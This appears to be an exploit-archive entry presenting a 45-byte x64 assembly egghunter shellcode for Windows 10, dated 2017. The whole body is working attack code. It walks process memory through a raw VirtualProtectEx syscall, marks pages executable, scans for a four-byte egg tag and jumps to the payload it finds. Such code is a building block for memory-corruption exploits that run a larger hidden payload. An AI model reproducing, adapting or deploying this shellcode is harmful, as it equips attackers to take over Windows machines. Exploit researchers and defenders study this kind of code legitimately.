Windows 10 x64 - Egghunter Shellcode (45 bytes)



EKU-ID: 6470 CVE: OSVDB-ID:
Author: Peter Baris Published: 2017-04-07 Verified: Verified
Download:

Rating

☆☆☆☆☆
Home


PUBLIC Win10egghunterx64
 
.code
 
Win10egghunterx64 PROC
 
_start:
    push 7fh
    pop rdi                               ; RDI is nonvolatile, so it will be preserved after syscalls
 
_setup:                  
    inc rdi                                ; parameter 1 - lpAddress - counter
    mov r9b,40h                      ; parameter 3 - flNewProtect - 0x40 PAGE_EXECUTE_READWRITE                          
    pop rsi                                ; Stack alignment before the stack setup
    pop rsi   
    push rdi                           
    push rsp
    pop rdx                                ; pointer to lpAddress
    push 08h                            ; parameter 2 - dwSize 0x8
    push rsp
    pop r8                                ; pointer to dwSize going to r8 - can be exchanged with mov r8,rsp
    mov [rdx+20h],rsp             ; parameter 4 - lpflOldprotect                    
    dec r10                                ; parameter 5 - hProcess - the handle will be -1, if not set you'll get a c0000008 error                             
_VirtualProtectEx:
    
    push 50h                            ; 0x50h for Windows 10 and Windows Server 2016 x64, 0x4Dh for Windows 7 family
    pop rax
    syscall
 
_rc_check:
 
    cmp al,01h                            ; check the response for non-allocated memory
    jge _setup
 
_end:                                    ; There won't be too many of these eggs in the memory
    
    mov eax, 042303042h                    ; the egg
    scasd
    jnz _setup
    jmp rdi
 
Win10egghunterx64 ENDP
END